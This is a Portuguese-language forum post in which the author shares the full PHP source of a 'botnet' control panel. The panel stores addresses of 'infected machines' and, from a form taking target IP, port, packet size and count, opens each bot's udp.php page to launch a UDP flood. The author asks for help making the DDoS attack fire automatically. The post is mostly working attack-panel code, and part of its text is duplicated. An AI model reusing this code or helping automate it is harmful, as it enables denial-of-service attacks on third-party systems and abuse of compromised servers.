Bom, eu tenho um script aqui de "botnet", a teoria do script é um botnet.php com uma index bem básica, aonde lê as bots de um arquivo.txt de attack UDP, porém quando eu ponho pra attack, ele abre as paginas de udp.php só que não ataca. Darei exemplos..
Screens;
Index.php
logo depois de escolher ip, porta, tamanho do pacote ect eu do go
e abre o tanto de bots que tinha "25"
sendo que fica assim, mais não ataca. ai eu tenho que ir em cada pagina e apertar enter ;/
alguém pode da uma ajuda pra eu fazer fica automatico isso? passarei o code full.
Screens;
Index.php
logo depois de escolher ip, porta, tamanho do pacote ect eu do go
e abre o tanto de bots que tinha "25"
sendo que fica assim, mais não ataca. ai eu tenho que ir em cada pagina e apertar enter ;/
alguém pode da uma ajuda pra eu fazer fica automatico isso? passarei o code full.
Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>P3DR4KX BOTS \__ Who So Serius? __/ </title> <style type="text/css"> @charset "utf-8"; /* CSS Document */ .site { background-color: #000000; background-image: url(img/header.png); background-repeat: repeat-x; border: 1px solid #1E90FF; position:absolute; top:0; bottom:0; color: #1E90FF; left:0; right:0; height:auto; width:70%; margin-right: auto; margin-left: auto; margin-top: 10px; margin-bottom:10px; -moz-border-radius: 1em 4em 1em 4em; border-radius: 1em 4em 1em 1em; padding-top: 5px; padding-right: 10px; padding-left: 5px; } .header { height: 200px; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: #1E90FF; color: #1E90FF; } .conteudo { height: 83%; overflow: auto; color: #1E90FF; } </style> </head> <body> <div class="site"> <div class="header"> </br> <?php print("<center><pre><font color=DodgerBlue>"); print(" `888888888 8888888 8888888 88888888 8 88' 88 88 88 88 </br>"); print(" 88 88 88 88 8 88 88 8 88 88 88 88 88 </br>"); print(" 88 88 88' 88 8 88 88 8 88 88 88 88 88 </br>"); print(" 888888888 88 88 8 8888888 888888 8888 888 </br>"); print(" 88 88' 88 8 88 88 ' 88 88 88 88 88 </br>"); print(" 88 88 88 8 88 88 88 88 88 88 88 </br>"); print(" 88 8888888 8888888 88 88 88 88 88 88 88 </br>"); print("</br>P3DR4KX B0T - Who So Serious? # FUCK ALL :}</a></font></pre></center>"); ?> </br> </div> <div class="conteudo"> <?php ########################################################## # Função para Salvar o endereço das Máquinas infectadas ########################################################## function salvarurl ($uri){ $abrir="urls.txt"; $fp=fopen($abrir,'a'); if(filesize("urls.txt")==0) $salvar="http://"."$uri"; else $salvar=";"."http://"."$uri"; fwrite($fp, $salvar); fclose($fp); }//Fim da função salvarurl ################################################# # Função para capturar os Bots ################################################# function captBot(){ $abrir="urls.txt"; $vazio=false; if (filesize($abrir)!=false){ $fp=fopen($abrir,'r+'); if ($fp==true){ $ler=fread($fp,filesize($abrir)); if ($ler!=""){ $bots=explode(";",$ler); $qnt=count($bots); fclose($fp); $vazio=true; return array($qnt,$bots,$vazio); } } } } ################################################# # Função para carregar a página de b0ts ################################################# function carregados(){ $carregados=captBot(); $qnt=$carregados[0]; $bots=$carregados[1]; $vazio=$carregados[2]; $server = $_SERVER['SERVER_NAME']; $url = $_SERVER ['REQUEST_URI']; $url1="$server"."$url"; print("<center> <form id='form1' name='b0t' value='1' method='POST' action=''>"); print(" <table width='500'>"); print("<tr><td><b><font color='DodgerBlue'>B0TS ;D</font></b></td></tr>"); if ($vazio==true){ for ($i=0;$i<$qnt;$i++){ print(" <tr>"); print(" <td><label>"); print(" $bots[$i]"); print("</td>"); print(" </tr>"); } print(" <tr>"); print(" <td> <label>Quantidade de B0TS a atacar<br />"); print(" <input type='text' name='qntBot' id='textfield3' value=$qnt />"); print(" </label>"); print("</td>"); print(" </tr>"); } print(" </table>"); print(" <hr>"); print(" <p>"); print(" <label>Alvo<br />"); print(" <input type='text' name='alvo' id='textfield' />"); print(" </label>"); print(" </p>"); print(" <p>"); print(" <label>Pacote<br />"); print(" <input type='text' name='tamanho' id='textfield2' />"); print(" </label>"); print(" </p>"); print(" <p>"); print(" <label>Quantidade De Pacotes<br />"); print(" <input type='text' name='quantidade' id='textfield3' />"); print(" </label>"); print(" </p>"); print(" <p>"); print(" <label>Porta<br />"); print(" <input type='text' name='porta' id='textfield4' />"); print(" </label>"); print(" </p>"); print(" <p>"); print(" <label>Mensagem<br />"); print(" <input type='text' name='msg' id='textfield5' />"); print(" </label>"); print(" </p>"); print(" <p>"); print(" <label>"); print(" <input type='submit' name='button' id='button' value='GO!' />"); print(" </label>"); print(" </p>"); print("</form></center>"); }//Fim da função carregabotnet //Capturar dados do formulário dos B0ts (DDOS) if (isset($_POST['qntBot'])){ $tam=(int)$_POST['tamanho']; $quan=(int)$_POST['quantidade']; $port=(int)$_POST['porta']; $msg=$_POST['msg']; $alvo=$_POST['alvo']; $quantBoot=(int)$_POST['qntBot']; $capt=captBot(); $nomes=$capt[1]; $quantidade=$capt[0]; if (($quantidade>=$quantBoot)&&($quantBoot>-1)){ print("<script>alert('ATENÇÃO O ATAQUE VAI SER INICIADO!!!!!');</script>"); for ($i=0;$i<$quantBoot;$i++){ echo $nomes[$i]; $links[$i]=$nomes[$i]; $redirecionar[$i]="<script>window.open('$links[$i]?url=$alvo&tam=$tam&qnt=$quan&port=$port&msg=$msg','B0t $i','menubar=1,scrollbars=NO,width=350,height=250');</script>"; echo $redirecionar[$i]; } } else{ print("<script>alert('ATENÇÃO VOCÊ DIGITOU UM VALOR INVÁLIDO!!!!!');</script>"); } }//FIM do Capturar dados do formulário dos B0ts (DDOS) if (isset($_GET["uri"])){ salvarurl($_GET["uri"]); print("<center>B0T Adicionado ;D"); $pg=$_SERVER['PHP_SELF']; print("<form id='form1' name='prin' value='1' method='POST' action='$pg'>"); print(" <input type='submit' id='button' value='Voltar!' />"); print("</form></center>"); } else carregados(); ?> </div> </div> </div> </body> </html>
Comment